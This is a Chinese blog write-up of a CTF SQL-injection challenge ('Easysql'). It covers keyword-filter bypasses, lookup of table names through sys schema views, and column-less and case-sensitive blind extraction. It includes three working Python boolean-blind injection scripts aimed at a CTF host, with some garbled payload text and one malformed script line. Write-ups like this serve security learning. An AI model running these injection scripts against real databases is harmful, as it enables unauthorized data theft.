Easysql

最新推荐文章于 2024-04-22 10:04:12 发布
最新推荐文章于 2024-04-22 10:04:12 发布
阅读量723 收藏
点赞数
分类专栏: i春秋公益赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/104645924
版权

无in注表名
无union select和字段名注数据

Fuzz测试过滤的关键词有:

union *** select
join
information_schema
in
or
and
sleep
benchmark
if
sys.schema_auto_increment_columns

因为过滤了in所以常用查询表名的方法不能用了
常用:information_schema,mysql.innodb_table_stats,innodb_index_stats
可用sys.x s c h e m a f l a t t e n e d k e y s 或 s y s . s c h e m a t a b l e s t a t i s t i c s 代 替 注 表 名 : s e l e c t g r o u p c o n c a t ( t a b l e n a m e ) f r o m s y s . x schema_flattened_keys 或 sys.schema_table_statistics 代替 注表名:select group_concat(table_name) from sys.x schemaflattenedkeyssys.schematablestatisticsselectgroupconcat(tablename)fromsys.xschema_flattened_keys
测试发现 2 || 1=1 回显与2 || 1=0 不同,所以可以盲注出表名。

Exp1:
import requests
import string
str1 = ('0123456789'+string.ascii_letters+string.punctuation).replace("'","").replace('"','').replace('\\','')
flag = ''
select = 'select group_concat(table_name) from sys.x$schema_flattened_keys'
for j in range(1,40):
    for i in str1:
        url = "http://3323eab8-d67f-4c2e-8833-54e9085df6cd.node3.buuoj.cn/index.php"
        payload = "1/**/&&/**/(select substr(({}),{},1))='{}'".format(select, j, i)
        data = {
            'id': payload,
        }
        r = requests.post(url,data=data)
        if 'Nu1L' in r.text:
            flag += i
            print(flag)
            break

获得表名 在这里插入图片描述
下面需要无列名获取数据,如果表中只有一列可以 SUBSTR((SELECT * FROM table),1,1)=‘x’
而题中有两列,需要将查询语句与相同数量的列进行比较,再配合 <= 进行盲注参考的paylaod是(select 1,‘admin’)>(select * from test)

Exp2:
import requests
url = "http://3323eab8-d67f-4c2e-8833-54e9085df6cd.node3.buuoj.cn/index.php"flag=''
str1=''
for i in range(1,50):
    print(i)
    for j in range(32, 128):
        payload = "(select ((select * from f1ag_1s_h3r3_hhhhh) < (select 1,'" +flag+chr(j) + "')))#"
        data = {
            'id': payload
        }
        res = requests.post(url, data=data)
        if 'Nu1L' in res.text:
            flag += chr(j-1)
            print(flag)
            break

这样出来的flag全是大写的,出题人实际上是另外一个考点就是区分大小写
MySQL默认是不分大小写的 但可以通过把字符转为二进制字符串就会强制进行对位的比较。
在这里插入图片描述
由于in被过滤了binary无法使用,但当一个字符串连接一个二进制的值时如:CONCAT(“aa”, BINARY(“BB”)),其得到的也将是二进制。且MySQL中的JSON对象是二进制对象,因此,CAST(0 AS JSON)会返回一个二进制字符串,进而SELECT CONCAT(“A”, CAST(0 AS JSON))也会返回一个二进制字符串。 //JSON需要MySQL5.7及以上版本
在这里插入图片描述

能区分大小写的exp2

exp2():
    str1 = ('-0123456789'+string.ascii_uppercase+string.ascii_lowercase+string.punctuation).replace("'","").replace('"','').replace('\\','')
    flag = ''
    flag_table_name = 'f1ag_1s_h3r3_hhhhh'
    for j in range(1,39):
        for i in str1:
            i = flag+i
            payload = "1&&((select 1,concat('{}~',CAST('0' as json))) < (select * from {} limit 1))".format(i,flag_table_name)
            #print(payload)
            data = {
                'id': payload,
            }
            r = requests.post(url,data=data)

            if 'Nu1L' not in r.text:
                flag=i
                print(flag)
                break

mysql比较字符串大小是按位比较的,通过给注入的字符加一个~,就能使得字符正确时的结果为false。// ~ 的ASCII码为126比可能注入的字符都大。
在这里插入图片描述在这里插入图片描述

参考:
https://www.smi1e.top/%e6%96%b0%e6%98%a5%e6%88%98%e7%96%ab%e5%85%ac%e7%9b%8a%e8%b5%9b-ezsqli-%e5%87%ba%e9%a2%98%e5%b0%8f%e8%ae%b0/
https://nosec.org/home/detail/3830.html
https://www.jianshu.com/p/b0a130fe5c4d

Arnoldqqq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
easy_sql解析
qq_73722777的博客
03-08 415
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
[suctf 2019]EasySQL
qq_61988806的博客
04-25 987
这里先对输入内容进行尝试我们发现输入字符串页面不会回显猜测当输入为字符串不会执行我们测试输入数字发现为1及1以上的时候回显输入0无回显我们大概知道查询语句带上||运算符||运算符和or作用一样及||两边有一边为true则语句顺利执行按照我们的输入知道||右边为0也就是flase那我们不知道||右边的语句先构造*,1 代表查询所以内容 这里没有from 所以我们也就是试一试这就之间出来了,所以我们知道||右边是flag from flag。
探索易用的数据库管理工具:EasySQL
最新发布
gitblog_00063的博客
04-22 414
探索易用的数据库管理工具:EasySQL 项目地址:https://gitcode.com/CarmJos/EasySQL 项目简介 EasySQL 是一个轻量级、高效的在线SQL查询工具,旨在为开发者和数据分析师提供方便快捷的数据库管理体验。它支持多种主流数据库系统,包括MySQL、PostgreSQL、SQLite等,并且具有强大的代码补全、语法高亮、查询结果可视化等功能。 技术分析 多数据库...
[强网杯]easy_sqli
baidu_39504221的博客
12-13 786
环境:攻防世界 order by 3报错说明有两个字段 尝试union select 有很多关键字被ban了,那只能堆叠注入了 暴库 http://220.249.52.134:33346/?inject=-1';show databases;--+ ctftraining information_schema mysql performance_schema supersqli test 暴ctftraining的表 http://220.249.52.134:33346/?inject=-1
BUUCTF EASY SQLI(虚拟用户)
qq_54929891的博客
03-01 1166
打开题目发现是一个登录框题目 ,按照常理一般UserName都是admin,密码随便弄一个试试 改变一下admin,会出来wrong user;看来账号就是admin了,想着这种题目不可能让我们死去注入吧,应该会有提示,便打开F12看看 发现有个注释的字符串,猜测是base32编码,因为: base64编码中包含大写字母(A-Z),小写字母(a-z),数字0-9以及+ / base32编码中只有大写字母(A-Z),数字234567,如果没有189就是base32编码 base16编码也..
EasySQL:基于WebMySQL数据库管理器
05-16
EasySQL EasySQL是用PHP编写的基于WebMySQL数据库管理工具。 ##安装下载只需从此处下载.zip文件,或单击(直接下载)并将其解压缩到服务器目录中即可。 注意:如果使用XAMPP安装,只需在/ htdocs文件夹中解压缩。...
easysql插件
02-24
"EasySQL插件"就是这样一个工具,专为提升Eclipse中的数据库管理和SQL操作体验而设计。 EasySQL插件的主要目标是简化开发者与数据库之间的交互,使得在Eclipse内部就能执行常见的SQL任务,如查询、插入、更新和删除...
easysql源码
09-07
easysql源码。。。。easysql源码。。。。easysql源码
DSO-NUS-CTF-Easysql:适用于DSO-NUS CTF 2021的Easysql上的撰写
03-11
DSO-NUS-CTF-Easysql:适用于DSO-NUS CTF 2021的Easysql上的撰写
Python库 | easySQL_fiachia-3.1.0-py2.py3-none-any.whl
04-21
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:easySQL_fiachia-3.1.0-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
easysql,中国人自己开发的类似Hibernate的框架,使用简单
12-19
easysql是一款完全由中国人自主开发的基于JDBC的数据库连接框架。该框架支持多版本数据库,使用方便。开发人员只需要通过一条SQL语句即可实现对数据库的增删改查,完全实现了代码的可重用性和对象的持久化。当然,由于作者的水平有限,该套框架目前还处于开发阶段,目前发布的是第一个版本(1.0.1)。该套框架是开源的,作者希望有能力,有水平的国人能在这套框架的基础上继续完善,给作者提出意见和建议。使这套框架能够拥有强大的生命力和持久力(就像当初的mysql一样,才出来的时候被人鄙视为一个玩具。但是经过开发人员和广大开源爱好者的共同努力,现在已经不亚于sqlserver了)。作者的邮箱是:zttsky@qq.com,希望各位国人能踊跃修改源代码,给作者提意见。(国货当自强)
[SUCTF 2019]EasySQL
m0_57291352的博客
05-05 1841
burp suite抓包 经过简单几个尝试,可以判断应该是布尔盲注,还是字符型的 回显会判断是0还是1,也就是true或是false 我通过类似(ascii(substr(database(),1,1))<1)的句子判断出了database()是ctf 但是没什么用,因为下一步爆表名的时候发现要么是无回显,要么是Nonono 搜了大佬们的解题 参考1 参考2 了解到可以用fuzz测试出被禁止使用的字符 关于fuzz现在还不熟悉,这里待补充 然后会发现想order、if、sleep、informatio
easy_sql
qq_45951598的博客
11-23 1366
本次题目了来着ctf里的一道supersqli 这里加一个单引号发现报错 这里orderby3就错了,发现只有两个字段。 联合注入发现,有过滤
青少年CTF擂台挑战赛 2024 #Round 1
NYG694的博客
03-02 1823
文件打开是一个print数组v4的地址和read函数,并且nx好像可写,输入长度可以利用,进行一个栈上写好自己的shell,然后在构造一个回到v4的地址,这样子就可以重新读取到写buf段上的shell,这里要注意shell的隔断用/00截断然后构造好栈上数据。一个sql注入题目,尝试使用二分查找,但只能爆出表名和列名,值一直出不来,后来采用布尔盲注,fuzz测试后发现没有加任何过滤,直接写脚本。第二题:为了求解方程 (5 + sqrt{x} = 8),我们可以分离平方根项,然后求解 (x)。
ctf(EasySQL)
Glacier_Mount的博客
10-07 590
查询语句的简单猜测
BUUCTF-EasySQL(sql注入题目)
m0_74167420的博客
03-10 441
为注释符,因而传入后台的是 select * from table_name where username='1' or 1=1 (因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag),则可返回真值。4、在该题目中,如果不匹配数据库也能返回真值那么就能绕过验证登录(万能用户名)。一般的,库验证登录注册查询数据会用到以下的句型,如果用户与密码匹配正确则返回。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。1、万能用户名/密码。2、在该题目中使用,
[SWPUCTF 2021 新生赛]easy_sql
qq_56301349的博客
07-15 3802
[SWPUCTF 2021 新生赛]easy_sql
ISCC,Web:Easy-SQL
Pai_Space
05-25 2380
select 等被过滤,绕不过 id=1 至 8 有一些信息 id=8 时 用 sqlmap 可以查到数据库是 Mysql 8 Mysql 8 存在 table 注入 浅谈利用mysql8新特性进行SQL注入 - 安全客,安全资讯平台 测是否存在 http://59.110.159.206:7010/?id=-1 union table users limit 0,1 存在,可以利用,由于 id=8 时提示查邮件,看看是否存在 email 回显了 email,查 b
buuctf easysql
09-09
关于buuctf easysql的问题,我可以提供一些基本信息。buuctf easysql 是一个CTF竞赛平台上的题目,它要求参赛者通过操作一个简化的SQL数据库,来解决一系列的SQL查询和操作任务。这个题目旨在测试参赛者对SQL语言和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值